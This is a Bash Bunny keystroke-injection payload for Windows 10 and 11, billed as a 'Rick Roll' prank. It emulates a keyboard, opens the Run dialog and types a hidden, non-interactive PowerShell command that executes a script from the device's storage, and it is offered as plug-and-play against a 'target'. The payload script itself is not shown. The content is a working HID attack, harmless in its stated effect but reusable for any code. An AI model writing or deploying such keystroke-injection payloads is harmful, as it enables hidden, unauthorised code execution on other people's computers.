# Title:         ADV-RickRoll
# Description:   This is a one liner payload that will Rick Roll your target. Video will be played a full screen and max volume. 
# 	           Upon deployment payload will pause until a mouse movement is detected and run once one is. 
# Author:        I am Jakoby
# Version:       1.0
# Category:      Prank
# Attackmodes:   HID, Storage
# Target:        Windows 10, 11

#     --------------------------------------------------------------------------------------
#     THIS PAYLOAD IS PLUG AND PLAY. NO MODIFICATIONS NEEDED SIMPLY RUN THE CODE DOWN BELOW.
#     --------------------------------------------------------------------------------------

LED SETUP

GET SWITCH_POSITION

ATTACKMODE HID STORAGE

LED STAGE1

QUACK DELAY 3000
QUACK GUI r
QUACK DELAY 100
LED STAGE2
QUACK STRING powershell -NoP -NonI -W h ".((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\rr\rr.ps1')"
QUACK ENTER